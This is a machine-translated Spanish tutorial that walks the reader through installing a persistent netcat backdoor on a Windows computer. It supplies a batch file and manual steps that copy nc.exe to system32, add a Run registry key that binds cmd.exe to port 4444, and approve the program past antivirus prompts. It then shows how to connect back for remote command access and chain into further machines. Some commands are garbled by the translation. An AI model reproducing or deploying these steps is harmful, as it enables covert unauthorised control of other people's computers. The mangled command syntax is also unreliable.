Netcat Fun !: 5 pasos

2024 Autor: John Day | [email protected]. Última modificación: 2024-01-30 08:44

¡Este instructivo le muestra cómo crear una puerta trasera en una computadora con netcat! Le mostraré dos formas de hacer esto, con y sin mi archivo por lotes que lo automatiza para usted. Este instructable ya asume que ya tiene permisos de root en la computadora, probablemente con un LiveCD 0phcrack aquí. Ahora, en el instructable.

Paso 1: Descarga Netcat

Le he ahorrado la molestia de 3 minutos de búsqueda en Google y he puesto nc.exe en instructables para que lo descargue. Opcionalmente, también puede descargar nc.bat, que es un archivo por lotes que he creado para automatizar el proceso por usted. Asegúrese de que si descarga nc.bat sea de 464 bytes, porque seguí cargando versiones y descubriendo que algo andaba mal. Si no tiene 464 bytes, el programa no se corresponderá con este instructable.

Paso 2: con Nc.bat

Primero, ambos archivos deben estar en el mismo directorio para que nc.bat funcione correctamente. Sugiero usar una unidad flash o un CD-ROM para esta operación. Usé una unidad flash de 512 mb geek squad para esto, pero soy solo yo. Por lo tanto, copie los archivos en su dispositivo de medios externo y llévelos a la computadora en la que tiene root. Acceda al dispositivo multimedia y haga doble clic en nc.bat. Esto copiará el archivo nc.exe a la carpeta system32, en la raíz del sistema (generalmente C: / Windows o C: / WINNT) y realizará los cambios necesarios en el registro. Luego escriba la dirección IP. Será algo así como '192.168.1.103', que es mío. Una vez hecho esto, reinicie la máquina e inicie sesión. Luego, el programa antivirus puede preguntarle si desea permitir / rechazar el programa. Haga clic en 'Permitir' o similar. Tenga en cuenta que en este instructivo, solo puede hacer telnet desde la red local de esa computadora. Luego sal, o cierra la sesión, o lo que quieras.

Paso 3: sin Nc.bat

Para hacer esto, debe tener nc.exe en un CD o unidad flash. Vaya a la computadora, inicie sesión y conecte la unidad flash o coloque su CD. A partir de aquí, hay dos formas: las interfaces gráficas de usuario pulidas de Windows, o la forma sucia y anticuada del símbolo del sistema. y escriba:

cmd.exeNavegue hasta la memoria flash o su unidad de CD. Si no sabe qué unidad es cuál, haga clic con el botón derecho en el botón de inicio y haga clic en explorar. Haga clic en todas las unidades no locales en Mi PC hasta que llegue a su unidad flash / CD. Recuerde la letra de la unidad y vuelva al símbolo del sistema. Escriba la letra de la unidad seguida de dos puntos, así: K: Luego escriba una línea a la vez, seguido de presionar la tecla de retorno

copiar nc.exe% systemroot% / system32 / nc.exereg agregar HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "Esa fue prácticamente la instalación. Todo lo que necesita saber ahora es la dirección IP local, que se puede encontrar fácilmente escribiendo el comando 'ipconfig' y buscando algo en la tabla como "192.168.1.103". Luego reinicie la máquina y vuelva a iniciar sesión. El programa antivirus puede preguntarle si desea permitir / rechazar. Haga clic en permitir. Entonces eres libre de hacer lo que quieras con la computadora. Las interfaces gráficas pulidas de Windows Haz clic derecho en el botón de inicio y haz clic en explorar. Haga clic en todas las unidades no locales en Mi PC hasta que llegue a su unidad flash / CD. Luego haga clic derecho en nc.exe y copie. Luego vaya a la unidad C y haga clic en la carpeta Windows o WINNT. Luego vaya a la carpeta system32 y pegue nc.exe. Cierra eso y ve a StartRun. Escribe regedit. Navegue por las carpetas hasta: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run Luego haga clic derecho en un espacio vacío y vaya a NewString Value. Escriba lo que desee para el nombre, pero para el valor, escriba

% raíz del sistema% / system32 / nc.exe -L -d -p 4444 -t -e cmd.exeEsa fue prácticamente la instalación. Todo lo que necesita saber ahora es la dirección IP local, que se puede encontrar fácilmente escribiendo el comando 'ipconfig' en el símbolo del sistema (StartRun: cmd.exe) y buscando algo en la tabla como "192.168.1.103". Luego reinicie la máquina y vuelva a iniciar sesión. El programa antivirus podría preguntarle si desea permitir / rechazar. Haga clic en permitir. Entonces eres libre de hacer lo que quieras con la computadora.

Paso 4: volver a entrar

Una vez que lo haya instalado y desee tomar el control del host, abra el símbolo del sistema o PuTTY. Creo que PuTTY es increíble, así que te dejaré descargarlo aquí. Usando PuTTYDownload y abre PuTTY.exe. Haga clic en el protocolo 'sin procesar'. En el cuadro de texto número de puerto, escriba 4444. En el cuadro "dirección de host", escriba la dirección IP que anotó durante la instalación. Luego presione enter. PuTTY debe conectarse a la caja y obtendrá un símbolo del sistema. Usando el símbolo del sistema Abra el símbolo del sistema y escriba 'telnet 4444'. Luego presione enter, y debería obtener un símbolo del sistema. Esto le permitirá hacer casi cualquier cosa que desee en la computadora de forma remota que puede hacer con una cuenta local. Realmente comienza a ponerse interesante cuando ingresas a una computadora, y luego ingresas a otra computadora desde esa computadora, para conectar una cadena completa de computadoras. ¡Diviértete (legalmente)!

Paso 5: código fuente

Como me lo pidieron, pondré el código fuente (para el archivo por lotes) y explicaré cada comando y lo que hace. ¡Esté alerta! Ésta es la versión actual del programa de instalación por lotes. Si el tuyo es diferente, el código será diferente.

@echo offcopy nc.exe% systemroot% / system32 / nc.exeif errorlevel 0 goto regeditgoto error: regeditreg add HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc. exe -L -d -p 4444 -t -e cmd.exe "si errorlevel 0 goto ip: errorecho ha ocurrido algo inesperado y el programa necesita salir. goto end: ipecho escribe la dirección IP de la tabla ipconfig: endecho end.echo cinta adhesiva fuera. pausa@echo off: le dice que no muestre los comandos al ejecutar. Copiar nc.exe% systemroot% / system32 / nc.exe: generalmente copia netcat en C: / WINDOWS / system32. Esto hace que cuando vuelva a entrar, en lugar de cambiar de directorio todo el tiempo, simplemente escriba "nc" para abrir otro puerto. Si el nivel de error 0 goto regedit-error check. Si la copia fue exitosa, continúa editando el registro..reg agregar HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" - (se supone que ser una línea) que agrega la clave de registro para reiniciar el programa cuando se reinicia. / f significa sobrescribir la clave existente, / v para el nombre de la clave, / d para los datos. El resto de las etiquetas se ingresan para netcat. -L dice que lo reinicie al salir, para que no tenga que esperar a que se reinicie la computadora. -d lo olvidé. -p 4444 especifica el número de puerto. -Lo olvidé. -e cmd.exe hace que el símbolo del sistema se inicie en una conexión remota. Si el nivel de error 0 pasa a la comprobación de errores de ip. Si la ejecución salió mal, saltaría esta línea y bajaría a la: etiqueta de error. Eco, ha ocurrido algo inesperado y el programa debe salir. -Le dice al programa que imprima "ha ocurrido algo inesperado y el programa debe salir. "en la pantalla.goto end-si fue al mensaje de error, algo salió mal y el programa necesita cerrarse de todos modos.:ip-Again, label.echo escriba la dirección IP de la tabla-Escribe" escriba la IP dirección de la tabla "a la pantalla. ipconfig: este es un comando que imprime información acerca de la configuración de su red de área local (LAN).:end-Label.echo end.-escribe" end "en la pantalla. -escribe "cinta adhesiva" en la pantalla. pausa-este comando pausa el programa y espera a que el usuario presione una tecla. En este programa, espera la entrada y luego sale del programa.